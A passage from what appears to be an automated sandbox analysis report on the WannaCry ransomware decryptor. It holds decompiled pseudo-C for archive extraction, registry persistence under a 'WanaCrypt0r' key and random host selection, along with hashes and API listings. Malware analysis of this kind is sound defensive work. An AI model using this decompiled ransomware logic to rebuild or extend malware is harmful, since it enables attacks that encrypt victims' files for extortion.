							while( *((intOrPtr*)(_t82 + 0x10)) < _t176) {
								E004113E0(_t82);
								_t82 =  *_t132;
								_t187 = _t187 + 4;
								__eflags =  *((intOrPtr*)(_t82 + 0x10)) - _t176;
							}
							_push( *((intOrPtr*)(_t132 + 0x138)));
							_push( *_t132);
							E00411660();
							_t187 = _t187 + 8;
							 *(_t132 + 4) = _t176;
							goto L14;
						} else {
							return 0x10000;
						}
					}
				} else {
					if(_t166 == 2 || _t166 == 1) {
						_t178 = _t175 | 0xffffffff;
						__eflags =  *(_t132 + 4) - _t178;
						if( *(_t132 + 4) != _t178) {
							E00411AC0( *_t132);
							_t187 = _t187 + 4;
						}
						_t90 =  *_t132;
						 *(_t132 + 4) = _t178;
						_t179 = _a4;
						__eflags = _t179 -  *((intOrPtr*)(_t90 + 4));
						if(_t179 <  *((intOrPtr*)(_t90 + 4))) {
							__eflags = _t179 -  *((intOrPtr*)(_t90 + 0x10));
							if(_t179 <  *((intOrPtr*)(_t90 + 0x10))) {
								E00411390(_t90);
								_t187 = _t187 + 4;
							}
							_t91 =  *_t132;
							__eflags =  *((intOrPtr*)(_t91 + 0x10)) - _t179;
							while( *((intOrPtr*)(_t91 + 0x10)) < _t179) {
								E004113E0(_t91);
								_t91 =  *_t132;
								_t187 = _t187 + 4;
								__eflags =  *((intOrPtr*)(_t91 + 0x10)) - _t179;
							}
							_t138 = _t132;
							E00411CF0(_t138, _t179,  &_v560);
							__eflags = _v304 & 0x00000010;
							if((_v304 & 0x00000010) == 0) {
								__eflags = _t166 - 1;
								if(_t166 != 1) {
									_t157 = _a8;
									_t185 = _t157;
									_t180 = _t157;
									_t94 =  *_t157;
									__eflags = _t94;
									while(_t94 != 0) {
										__eflags = _t94 - 0x2f;
										if(_t94 == 0x2f) {
											L43:
											_t185 = _t180 + 1;
										} else {
											__eflags = _t94 - 0x5c;
											if(_t94 == 0x5c) {
												goto L43;
											}
										}
										_t94 =  *((intOrPtr*)(_t180 + 1));
										_t180 = _t180 + 1;
										__eflags = _t94;
									}
									asm("repne scasb");
									_t140 =  !(_t138 | 0xffffffff);
									_v828 =  &_v820;
									_t182 = _t157 - _t140;
									_t141 = _t140 >> 2;
									_t97 = memcpy(_v828, _t182, _t141 << 2);
									__eflags = _t185 - _t157;
									memcpy(_t182 + _t141 + _t141, _t182, _t97 & 0x00000003);
									_t191 = _t187 + 0x18;
									if(__eflags != 0) {
										 *((char*)(_t191 + _t185 - _t157 + 0x1c)) = 0;
										_t99 = _v820;
										__eflags = _t99 - 0x2f;
										if(_t99 == 0x2f) {
											L55:
											wsprintfA( &_v260, "%s%s",  &_v820, _t185);
											E00412250(0, _t191 + 0x2c);
											_t187 = _t191 + 0x18;
											goto L48;
										} else {
											__eflags = _t99 - 0x5c;
											if(_t99 == 0x5c) {
												goto L55;
											} else {
												__eflags = _t99;
												if(_t99 == 0) {
													goto L47;
												} else {
													__eflags =  *((char*)(_t191 + 0x1d)) - 0x3a;
													if( *((char*)(_t191 + 0x1d)) != 0x3a) {
														goto L47;
													} else {
														goto L55;
													}
												}
											}
										}
										goto L73;
									} else {
										_v820 = 0;
										L47:
										wsprintfA( &_v260, "%s%s%s", _t132 + 0x140,  &_v820, _t185);
										E00412250(_t132 + 0x140, _t191 + 0x30);
										_t187 = _t191 + 0x1c;
									}
									L48:
									_t104 = CreateFileA(_t187 + 0x260, 0x40000000, 0, 0, 2,  *(_t187 + 0x228), 0); // executed
									_t174 = _t104;
								} else {
									_t174 = _a8;
								}
								__eflags = _t174 - 0xffffffff;
								if(_t174 != 0xffffffff) {
									_push( *((intOrPtr*)(_t132 + 0x138)));
									_push( *_t132); // executed
									E00411660(); // executed
									_t106 =  *(_t132 + 0x13c);
									_t192 = _t187 + 8;
									__eflags = _t106;
									if(_t106 == 0) {
										_push(0x4000); // executed
										L00412CEC(); // executed
										_t192 = _t192 + 4;
										 *(_t132 + 0x13c) = _t106;
									}
									_v820 = 0;
									while(1) {
										_t183 = E00411810( *_t132,  *(_t132 + 0x13c), 0x4000, _t192 + 0x13);
										_t192 = _t192 + 0x10;
										__eflags = _t183 - 0xffffff96;
										if(_t183 == 0xffffff96) {
											break;
										}
										__eflags = _t183;
										if(__eflags < 0) {
											L68:
											_v820 = 0x5000000;
										} else {
											if(__eflags <= 0) {
												L63:
												__eflags =  *(_t192 + 0x13);
												if( *(_t192 + 0x13) != 0) {
													SetFileTime(_t174,  &_v276,  &_v284,  &_v268); // executed
												} else {
													__eflags = _t183;
													if(_t183 == 0) {
														goto L68;
													} else {
														continue;
													}
												}
											} else {
												_t116 = WriteFile(_t174,  *(_t132 + 0x13c), _t183, _t192 + 0x18, 0); // executed
												__eflags = _t116;
												if(_t116 == 0) {
													_v820 = 0x400;
												} else {
													goto L63;
												}
											}
										}
										L70:
										__eflags =  *((intOrPtr*)(_t192 + 0x360)) - 1;
										if( *((intOrPtr*)(_t192 + 0x360)) != 1) {
											FindCloseChangeNotification(_t174); // executed
										}
										E00411AC0( *_t132);
										return _v820;
										goto L73;
									}
									_v820 = 0x1000;
									goto L70;
								} else {
									return 0x200;
								}
							} else {
								__eflags = _t166 - 1;
								if(_t166 != 1) {
									_t154 = _a8;
									_t121 =  *_t154;
									__eflags = _t121 - 0x2f;
									if(_t121 == 0x2f) {
										L36:
										E00412250(0, _t154);
										__eflags = 0;
										return 0;
									} else {
										__eflags = _t121 - 0x5c;
										if(_t121 == 0x5c) {
											goto L36;
										} else {
											__eflags = _t121;
											if(_t121 == 0) {
												L37:
												E00412250(_t132 + 0x140, _t154);
												__eflags = 0;
												return 0;
											} else {
												__eflags =  *((char*)(_t154 + 1)) - 0x3a;
												if( *((char*)(_t154 + 1)) != 0x3a) {
													goto L37;
												} else {
													goto L36;
												}
											}
										}
									}
								} else {
									__eflags = 0;
									return 0;
								}
							}
						} else {
							return 0x10000;
						}
					} else {
						return 0x10000;
					}
				}
				L73:
			}



















































                                                      0x0041236a
                                                      0x00412371
                                                      0x00412376
                                                      0x0041239c
                                                      0x0041239f
                                                      0x004123a6
                                                      0x004123a8
                                                      0x00412414
                                                      0x00412431
                                                      0x00412436
                                                      0x00412438
                                                      0x0041243d
                                                      0x00412445
                                                      0x00412445
                                                      0x00412450
                                                      0x00412452
                                                      0x00412463
                                                      0x00412465
                                                      0x00412482
                                                      0x0041248b
                                                      0x0041248b
                                                      0x00412496
                                                      0x0041246a
                                                      0x00412476
                                                      0x00412476
                                                      0x00412457
                                                      0x00412457
                                                      0x00412460
                                                      0x00412460
                                                      0x004123aa
                                                      0x004123aa
                                                      0x004123ad
                                                      0x004123b2
                                                      0x004123b7
                                                      0x004123b7
                                                      0x004123ba
                                                      0x004123bc
                                                      0x004123c3
                                                      0x004123c6
                                                      0x004123da
                                                      0x004123dd
                                                      0x004123e0
                                                      0x004123e5
                                                      0x004123e5
                                                      0x004123e8
                                                      0x004123ea
                                                      0x004123ed
                                                      0x004123f0
                                                      0x004123f5
                                                      0x004123f7
                                                      0x004123fa
                                                      0x004123fa
                                                      0x00412407
                                                      0x00412408
                                                      0x00412409
                                                      0x0041240e
                                                      0x00412411
                                                      0x00000000
                                                      0x004123cb
                                                      0x004123d7
                                                      0x004123d7
                                                      0x004123c6
                                                      0x00412378
                                                      0x0041237b
                                                      0x0041249c
                                                      0x0041249f
                                                      0x004124a1
                                                      0x004124a6
                                                      0x004124ab
                                                      0x004124ab
                                                      0x004124ae
                                                      0x004124b0
                                                      0x004124b3
                                                      0x004124ba
                                                      0x004124bd
                                                      0x004124d1
                                                      0x004124d4
                                                      0x004124d7
                                                      0x004124dc
                                                      0x004124dc
                                                      0x004124df
                                                      0x004124e1
                                                      0x004124e4
                                                      0x004124e7
                                                      0x004124ec
                                                      0x004124ee
                                                      0x004124f1
                                                      0x004124f1
                                                      0x004124fd
                                                      0x00412501
                                                      0x00412506
                                                      0x0041250e
                                                      0x00412578
                                                      0x0041257b
                                                      0x00412589
                                                      0x00412590
                                                      0x00412592
                                                      0x00412594
                                                      0x00412596
                                                      0x00412598
                                                      0x0041259a
                                                      0x0041259c
                                                      0x004125a2
                                                      0x004125a2
                                                      0x0041259e
                                                      0x0041259e
                                                      0x004125a0
                                                      0x00000000
                                                      0x00000000
                                                      0x004125a0
                                                      0x004125a5
                                                      0x004125a8
                                                      0x004125a9
                                                      0x004125a9
                                                      0x004125b8
                                                      0x004125ba
                                                      0x004125be
                                                      0x004125c4
                                                      0x004125ca
                                                      0x004125cd
                                                      0x004125d4
                                                      0x004125d6
                                                      0x004125d6
                                                      0x004125d8
                                                      0x0041264d
                                                      0x00412652
                                                      0x00412656
                                                      0x00412658
                                                      0x00412671
                                                      0x00412684
                                                      0x00412691
                                                      0x00412696
                                                      0x00000000
                                                      0x0041265a
                                                      0x0041265a
                                                      0x0041265c
                                                      0x00000000
                                                      0x0041265e
                                                      0x0041265e
                                                      0x00412660
                                                      0x00000000
                                                      0x00412666
                                                      0x00412666
                                                      0x0041266b
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0041266b
                                                      0x00412660
                                                      0x0041265c
                                                      0x00000000
                                                      0x004125da
                                                      0x004125da
                                                      0x004125df
                                                      0x004125f9
                                                      0x00412605
                                                      0x0041260a
                                                      0x0041260a
                                                      0x0041260d
                                                      0x0041262a
                                                      0x00412630
                                                      0x0041257d
                                                      0x0041257d
                                                      0x0041257d
                                                      0x00412632
                                                      0x00412635
                                                      0x004126a6
                                                      0x004126a7
                                                      0x004126a8
                                                      0x004126ad
                                                      0x004126b3
                                                      0x004126b6
                                                      0x004126b8
                                                      0x004126ba
                                                      0x004126bf
                                                      0x004126c4
                                                      0x004126c7
                                                      0x004126c7
                                                      0x004126d3
                                                      0x004126db
                                                      0x004126f4
                                                      0x004126f6
                                                      0x004126f9
                                                      0x004126fc
                                                      0x00000000
                                                      0x00000000
                                                      0x004126fe
                                                      0x00412700
                                                      0x0041273c
                                                      0x0041273c
                                                      0x00412702
                                                      0x00412702
                                                      0x0041271a
                                                      0x0041271e
                                                      0x00412720
                                                      0x0041275f
                                                      0x00412722
                                                      0x00412722
                                                      0x00412724
                                                      0x00000000
                                                      0x00412726
                                                      0x00000000
                                                      0x00412726
                                                      0x00412724
                                                      0x00412704
                                                      0x00412714
                                                      0x00412716
                                                      0x00412718
                                                      0x00412732
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00412718
                                                      0x00412702
                                                      0x00412765
                                                      0x00412765
                                                      0x0041276d
                                                      0x00412770
                                                      0x00412770
                                                      0x00412779
                                                      0x0041278f
                                                      0x00000000
                                                      0x0041278f
                                                      0x00412728
                                                      0x00000000
                                                      0x0041263a
                                                      0x00412646
                                                      0x00412646
                                                      0x00412510
                                                      0x00412510
                                                      0x00412513
                                                      0x00412524
                                                      0x0041252b
                                                      0x0041252d
                                                      0x0041252f
                                                      0x0041253f
                                                      0x00412542
                                                      0x0041254a
                                                      0x00412556
                                                      0x00412531
                                                      0x00412531
                                                      0x00412533
                                                      0x00000000
                                                      0x00412535
                                                      0x00412535
                                                      0x00412537
                                                      0x00412559
                                                      0x00412561
                                                      0x00412569
                                                      0x00412575
                                                      0x00412539
                                                      0x00412539
                                                      0x0041253d
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0041253d
                                                      0x00412537
                                                      0x00412533
                                                      0x00412518
                                                      0x00412518
                                                      0x00412521
                                                      0x00412521
                                                      0x00412513
                                                      0x004124c2
                                                      0x004124ce
                                                      0x004124ce
                                                      0x0041238d
                                                      0x00412399
                                                      0x00412399
                                                      0x0041237b
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: %s%s$%s%s%s$:
                                                      • API String ID: 0-3034790606
                                                      • Opcode ID: 8e6b1c0f2cb56c42e6e36ab9d60359e8445b3ce9f897c3f3fd7fecc5fb48561e
                                                      • Instruction ID: ec0a86814d75b7591ef383b01d603f7b60d36dbaf36e5cde56c141efaaef7cbf
                                                      • Opcode Fuzzy Hash: 8e6b1c0f2cb56c42e6e36ab9d60359e8445b3ce9f897c3f3fd7fecc5fb48561e
                                                      • Instruction Fuzzy Hash: 67C138726002045BDB20DF18ED81BEB7398EB85314F04456BFD54CB385D2BDE99A87AA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00401C70 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 114registryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 426 401c70-401cd8 wcscat 427 401cdc-401cde 426->427 428 401ce0-401cef 427->428 429 401cf1-401cfb 427->429 430 401d00-401d0c RegCreateKeyW 428->430 429->430 431 401d12-401d1b 430->431 432 401dad-401db5 430->432 433 401d62-401d8e RegQueryValueExA 431->433 434 401d1d-401d60 GetCurrentDirectoryA RegSetValueExA 431->434 432->427 435 401dbb-401dc7 432->435 436 401d9e-401dab RegCloseKey 433->436 437 401d90-401d98 SetCurrentDirectoryA 433->437 434->436 436->432 438 401dc8-401dd7 436->438 437->436
                                                      C-Code - Quality: 84%
                                                      			E00401C70(signed int _a4) {
				void _v519;
				char _v520;
				void _v700;
				short _v720;
				int _v724;
				void* _v728;
				int _t30;
				void* _t36;
				signed int _t38;
				signed int _t46;
				signed int _t56;
				int _t72;
				void* _t77;

				_t30 = memset( &_v700, memcpy( &_v720, L"Software\\", 5 << 2), 0x2d << 2);
				_v520 = _t30;
				memset( &_v519, _t30, 0x81 << 2);
				asm("stosw");
				asm("stosb");
				_v728 = 0;
				wcscat( &_v720, L"WanaCrypt0r");
				_t72 = 0;
				_v724 = 0;
				do {
					if(_t72 != 0) {
						RegCreateKeyW(0x80000001,  &_v720,  &_v728);
					} else {
						RegCreateKeyW(0x80000002,  &_v720,  &_v728);
					}
					_t36 = _v728;
					if(_t36 == 0) {
						goto L10;
					} else {
						_t56 = _a4;
						if(_t56 == 0) {
							_v724 = 0x207;
							_t38 = RegQueryValueExA(_t36, "wd", 0, 0,  &_v520,  &_v724); // executed
							asm("sbb esi, esi");
							_t77 =  ~_t38 + 1;
							if(_t77 != 0) {
								SetCurrentDirectoryA( &_v520);
							}
						} else {
							GetCurrentDirectoryA(0x207,  &_v520);
							asm("repne scasb");
							_t46 = RegSetValueExA(_v728, "wd", 0, 1,  &_v520,  !(_t56 | 0xffffffff));
							_t72 = _v724;
							asm("sbb esi, esi");
							_t77 =  ~_t46 + 1;
						}
						RegCloseKey(_v728); // executed
						if(_t77 != 0) {
							return 1;
						} else {
							goto L10;
						}
					}
					L13:
					L10:
					_t72 = _t72 + 1;
					_v724 = _t72;
				} while (_t72 < 2);
				return 0;
				goto L13;
			}
















                                                      0x00401c95
                                                      0x00401ca3
                                                      0x00401caf
                                                      0x00401cb1
                                                      0x00401cb3
                                                      0x00401cb8
                                                      0x00401cc1
                                                      0x00401cd6
                                                      0x00401cd8
                                                      0x00401cdc
                                                      0x00401cde
                                                      0x00401d00
                                                      0x00401ce0
                                                      0x00401d00
                                                      0x00401d00
                                                      0x00401d06
                                                      0x00401d0c
                                                      0x00000000
                                                      0x00401d12
                                                      0x00401d12
                                                      0x00401d1b
                                                      0x00401d79
                                                      0x00401d81
                                                      0x00401d8b
                                                      0x00401d8d
                                                      0x00401d8e
                                                      0x00401d98
                                                      0x00401d98
                                                      0x00401d1d
                                                      0x00401d2a
                                                      0x00401d38
                                                      0x00401d53
                                                      0x00401d55
                                                      0x00401d5d
                                                      0x00401d5f
                                                      0x00401d5f
                                                      0x00401da3
                                                      0x00401dab
                                                      0x00401dd7
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00401dab
                                                      0x00000000
                                                      0x00401dad
                                                      0x00401dad
                                                      0x00401db1
                                                      0x00401db1
                                                      0x00401dc7
                                                      0x00000000

                                                      APIs
                                                      • wcscat.MSVCRT ref: 00401CC1
                                                      • RegCreateKeyW.ADVAPI32(80000001,?,?), ref: 00401D00
                                                      • GetCurrentDirectoryA.KERNEL32(00000207,?), ref: 00401D2A
                                                      • RegSetValueExA.ADVAPI32(?,0041FDC4,00000000,00000001,?), ref: 00401D53
                                                      • RegQueryValueExA.KERNELBASE ref: 00401D81
                                                      • SetCurrentDirectoryA.KERNEL32(?), ref: 00401D98
                                                      • RegCloseKey.KERNELBASE(00000000), ref: 00401DA3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CurrentDirectoryValue$CloseCreateQuerywcscat
                                                      • String ID: Software\$WanaCrypt0r
                                                      • API String ID: 3883271862-1723423467
                                                      • Opcode ID: 105d7a24118395946ed673951bb32e2166cb0bb2b49e0db688a6da733a97e5a2
                                                      • Instruction ID: c02b3dbe7123360802e3a7ceba079e11f57c538643229ddb10ed726050e42e59
                                                      • Opcode Fuzzy Hash: 105d7a24118395946ed673951bb32e2166cb0bb2b49e0db688a6da733a97e5a2
                                                      • Instruction Fuzzy Hash: 5F31C271208341ABD320CF54DC44BEBB7A8FFC4750F404D2EF996A7290D7B4A90987A6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040BAF0 Relevance: 15.3, APIs: 10, Instructions: 301stringsleepCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 439 40baf0-40bb16 call 40ba10 442 40bdf5 439->442 443 40bb1c-40bb36 439->443 444 40bdf8-40be10 442->444 446 40bb38-40bb47 call 40ba60 443->446 447 40bb4d-40bbb5 call 40c8f0 strtok 443->447 446->444 446->447 452 40bc30-40bc3f 447->452 453 40bbb7 447->453 454 40bc41-40bc48 452->454 455 40bc7e-40bc90 call 40ba60 452->455 456 40bbbb-40bbc0 453->456 457 40bc4d-40bc55 454->457 465 40bc92-40bce7 call 40c860 #825 455->465 466 40bcec-40bd01 GetTickCount srand 455->466 458 40bbc2-40bc16 call 40c7b0 call 40c920 call 40c800 call 40c7b0 456->458 459 40bc1b-40bc2e strtok 456->459 461 40bc75-40bc77 457->461 462 40bc57-40bc59 457->462 458->459 459->452 459->456 469 40bc7a-40bc7c 461->469 467 40bc71-40bc73 462->467 468 40bc5b-40bc65 462->468 465->444 472 40bdc7-40bdf2 call 40c860 #825 466->472 473 40bd07-40bd1c rand 466->473 467->469 468->461 474 40bc67-40bc6f 468->474 469->455 469->466 472->442 478 40bd26-40bd28 473->478 479 40bd1e 473->479 474->457 474->467 484 40bd32-40bd3a 478->484 485 40bd2a 478->485 483 40bd20-40bd24 479->483 483->478 483->483 488 40bd41-40bd73 call 40ba60 484->488 489 40bd3c 484->489 487 40bd2c-40bd30 485->487 487->484 487->487 493 40be11-40be4c 488->493 494 40bd79-40bdc1 call 40ce50 #825 Sleep 488->494 489->488 495 40be75-40be84 #825 493->495 496 40be4e-40be73 call 402d90 call 40c740 493->496 494->472 494->473 495->444 496->495
                                                      C-Code - Quality: 86%
                                                      			E0040BAF0() {
				signed int _t71;
				signed int _t72;
				void* _t84;
				signed int _t86;
				signed int _t91;
				signed int _t92;
				signed int _t97;
				intOrPtr _t101;
				signed int _t110;
				void* _t113;
				void* _t116;
				signed int _t126;
				char _t129;
				signed int _t131;
				unsigned int _t138;
				signed int _t139;
				char* _t144;
				signed int _t147;
				unsigned int _t152;
				signed int _t153;
				signed int _t158;
				signed int _t160;
				signed int _t161;
				signed int _t169;
				signed int _t172;
				signed int _t173;
				signed int _t181;
				signed int _t191;
				signed int _t198;
				signed int _t199;
				signed int _t200;
				void* _t237;
				char* _t238;
				void* _t240;
				void* _t241;
				intOrPtr* _t242;
				void* _t245;
				intOrPtr* _t246;
				signed int _t249;
				intOrPtr* _t250;
				intOrPtr _t251;
				void* _t252;
				void* _t255;
				void* _t256;
				void* _t257;
				void* _t259;
				void* _t260;
				void* _t262;
				void* _t263;
				void* _t264;

				_push(0xffffffff);
				_push(E00414286);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t251;
				_t252 = _t251 - 0x47c;
				_t71 = E0040BA10();
				if(_t71 != 0) {
					L31:
					_t72 = _t71 | 0xffffffff;
					__eflags = _t72;
				} else {
					_t131 =  *0x422210; // 0xab4238
					 *((intOrPtr*)( *_t131 + 0xc))();
					asm("repne scasb");
					_t266 =  !(_t131 | 0xffffffff) == 1;
					if( !(_t131 | 0xffffffff) == 1) {
						L3:
						_t249 = 0;
						 *((char*)(_t252 + 0x14)) =  *((intOrPtr*)(_t252 + 0x13));
						 *((intOrPtr*)(_t252 + 0x18)) = E0040C8F0(0, 0, 0);
						 *(_t252 + 0x1c) = 0;
						asm("repne scasb");
						_t138 =  !(_t252 + 0x0000001c | 0xffffffff);
						_t237 =  *((intOrPtr*)(_t252 + 0x49c)) - _t138;
						 *((intOrPtr*)(_t252 + 0x498)) = 0;
						_t139 = _t138 >> 2;
						memcpy(_t237 + _t139 + _t139, _t237, memcpy(_t252 + 0xa4, _t237, _t139 << 2) & 0x00000003);
						_t255 = _t252 + 0x18;
						_t144 = _t255 + 0xa8;
						_t238 = strtok(_t144, ",;");
						_t256 = _t255 + 8;
						if(_t238 != 0) {
							_t129 =  *((intOrPtr*)(_t256 + 0x13));
							do {
								_t200 = _t249;
								_t249 = _t249 + 1;
								if(_t200 > 0) {
									_t181 = _t256 + 0x28;
									 *(_t256 + 0x28) = _t129;
									E0040C7B0(_t181, 0);
									asm("repne scasb");
									_push( !(_t181 | 0xffffffff) - 1);
									_push(_t238);
									E0040C920(_t256 + 0x2c);
									 *((char*)(_t256 + 0x4a0)) = 1;
									E0040C800(_t256 + 0x24, _t256 + 0x20, _t256 + 0x24,  *((intOrPtr*)(_t256 + 0x18)), _t256 + 0x24);
									_t144 = _t256 + 0x28;
									 *((char*)(_t256 + 0x498)) = 0;
									E0040C7B0(_t144, 1);
								}
								_t238 = strtok(0, ",;");
								_t256 = _t256 + 8;
							} while (_t238 != 0);
						}
						asm("repne scasb");
						_t147 =  !(_t144 | 0xffffffff) - 1;
						if(_t147 == 0) {
							L17:
							_push(_t256 + 0xa4);
							_t84 = E0040BA60(_t277);
							_t256 = _t256 + 4;
							if(_t84 != 0) {
								goto L19;
							} else {
								asm("repne scasb");
								_t172 =  !(_t147 | 0xffffffff);
								_t245 = _t256 + 0xa4 - _t172;
								_t173 = _t172 >> 2;
								memcpy(0x422214, _t245, _t173 << 2);
								_t263 = _t256 + 0xc;
								 *((intOrPtr*)(_t263 + 0x498)) = 0xffffffff;
								_t113 = memcpy(_t245 + _t173 + _t173, _t245, _t172 & 0x00000003);
								_t264 = _t263 + 0xc;
								E0040C860(_t264 + 0x20, _t264 + 0x24,  *_t113,  *((intOrPtr*)(_t256 + 0x18)));
								_push( *((intOrPtr*)(_t264 + 0x18)));
								L00412C98();
								_t252 = _t264 + 4;
								_t72 = 0;
							}
						} else {
							_t246 = _t256 + 0xa4;
							_t116 = 0x422214;
							while(1) {
								_t198 =  *_t116;
								_t147 = _t198;
								if(_t198 !=  *_t246) {
									break;
								}
								if(_t147 == 0) {
									L14:
									_t116 = 0;
								} else {
									_t24 = _t116 + 1; // 0x0
									_t199 =  *_t24;
									_t147 = _t199;
									if(_t199 !=  *((intOrPtr*)(_t246 + 1))) {
										break;
									} else {
										_t116 = _t116 + 2;
										_t246 = _t246 + 2;
										if(_t147 != 0) {
											continue;
										} else {
											goto L14;
										}
									}
								}
								L16:
								_t277 = _t116;
								if(_t116 == 0) {
									L19:
									srand(GetTickCount());
									_t86 =  *(_t256 + 0x20);
									_t257 = _t256 + 4;
									__eflags = _t86;
									if(_t86 <= 0) {
										L30:
										 *((intOrPtr*)(_t257 + 0x494)) = 0xffffffff;
										_t71 = E0040C860(_t257 + 0x20, _t257 + 0x3c,  *((intOrPtr*)( *((intOrPtr*)(_t257 + 0x18)))),  *((intOrPtr*)(_t257 + 0x18)));
										_push( *((intOrPtr*)(_t257 + 0x18)));
										L00412C98();
										_t252 = _t257 + 4;
										goto L31;
									} else {
										do {
											_t191 = rand() % _t86;
											_t250 =  *((intOrPtr*)( *((intOrPtr*)(_t257 + 0x18))));
											__eflags = _t191;
											_t91 = _t191;
											if(_t191 > 0) {
												_t91 = 0;
												__eflags = 0;
												do {
													_t250 =  *_t250;
													_t191 = _t191 - 1;
													__eflags = _t191;
												} while (_t191 != 0);
											}
											__eflags = _t91;
											if(_t91 < 0) {
												_t110 =  ~_t91;
												do {
													_t250 =  *((intOrPtr*)(_t250 + 4));
													_t110 = _t110 - 1;
													__eflags = _t110;
												} while (_t110 != 0);
											}
											_t92 =  *(_t250 + 0xc);
											_t42 = _t250 + 8; // 0x8
											_t126 = _t42;
											__eflags = _t92;
											if(__eflags == 0) {
												_t92 = 0x41ba38;
											}
											asm("repne scasb");
											_t152 =  !(_t147 | 0xffffffff);
											_t240 = _t92 - _t152;
											_t153 = _t152 >> 2;
											memcpy(_t240 + _t153 + _t153, _t240, memcpy(_t257 + 0x40, _t240, _t153 << 2) & 0x00000003);
											_t259 = _t257 + 0x18;
											_t158 = _t259 + 0x40;
											_push(_t158);
											_t97 = E0040BA60(__eflags);
											_t260 = _t259 + 4;
											__eflags = _t97;
											if(_t97 == 0) {
												 *((intOrPtr*)(_t260 + 0x494)) = 0xffffffff;
												asm("repne scasb");
												_t160 =  !(_t158 | 0xffffffff);
												_t241 = _t260 + 0x40 - _t160;
												_t161 = _t160 >> 2;
												memcpy(0x422214, _t241, _t161 << 2);
												memcpy(_t241 + _t161 + _t161, _t241, _t160 & 0x00000003);
												_t262 = _t260 + 0x18;
												_t242 =  *((intOrPtr*)(_t262 + 0x18));
												_t101 =  *_t242;
												__eflags = _t101 - _t242;
												 *((intOrPtr*)(_t262 + 0x20)) = _t101;
												if(_t101 != _t242) {
													do {
														_push(0);
														E0040C740(_t262 + 0x1c, _t262 + 0x3c,  *((intOrPtr*)(E00402D90(_t262 + 0x28, _t262 + 0x38))));
														__eflags =  *((intOrPtr*)(_t262 + 0x20)) - _t242;
													} while ( *((intOrPtr*)(_t262 + 0x20)) != _t242);
												}
												_push( *((intOrPtr*)(_t262 + 0x18)));
												L00412C98();
												_t252 = _t262 + 4;
												_t72 = 0;
											} else {
												goto L29;
											}
											goto L32;
											L29:
											_t169 =  *0x422210; // 0xab4238
											 *((intOrPtr*)( *_t169 + 0xc))();
											 *((intOrPtr*)( *((intOrPtr*)(_t250 + 4)))) =  *_t250;
											_t147 = _t126;
											 *((intOrPtr*)( *_t250 + 4)) =  *((intOrPtr*)(_t250 + 4));
											E0040CE50(_t147, 0);
											_push(_t250);
											L00412C98();
											_t257 = _t260 + 4;
											 *((intOrPtr*)(_t257 + 0x20)) =  *((intOrPtr*)(_t260 + 0x20)) - 1;
											Sleep(0xbb8); // executed
											_t86 =  *(_t257 + 0x1c);
											__eflags = _t86;
										} while (_t86 > 0);
										goto L30;
									}
								} else {
									goto L17;
								}
								goto L32;
							}
							asm("sbb eax, eax");
							asm("sbb eax, 0xffffffff");
							goto L16;
						}
					} else {
						_push(0x422214);
						_t72 = E0040BA60(_t266);
						_t252 = _t252 + 4;
						if(_t72 != 0) {
							goto L3;
						}
					}
				}
				L32:
				 *[fs:0x0] =  *((intOrPtr*)(_t252 + 0x48c));
				return _t72;
			}





















































                                                      0x0040baf6
                                                      0x0040baf8
                                                      0x0040bafd
                                                      0x0040bafe
                                                      0x0040bb05
                                                      0x0040bb0f
                                                      0x0040bb16
                                                      0x0040bdf5
                                                      0x0040bdf5
                                                      0x0040bdf5
                                                      0x0040bb1c
                                                      0x0040bb1c
                                                      0x0040bb24
                                                      0x0040bb31
                                                      0x0040bb35
                                                      0x0040bb36
                                                      0x0040bb4d
                                                      0x0040bb51
                                                      0x0040bb53
                                                      0x0040bb62
                                                      0x0040bb66
                                                      0x0040bb7d
                                                      0x0040bb7f
                                                      0x0040bb8a
                                                      0x0040bb8e
                                                      0x0040bb95
                                                      0x0040bb9f
                                                      0x0040bb9f
                                                      0x0040bba1
                                                      0x0040bbae
                                                      0x0040bbb0
                                                      0x0040bbb5
                                                      0x0040bbb7
                                                      0x0040bbbb
                                                      0x0040bbbb
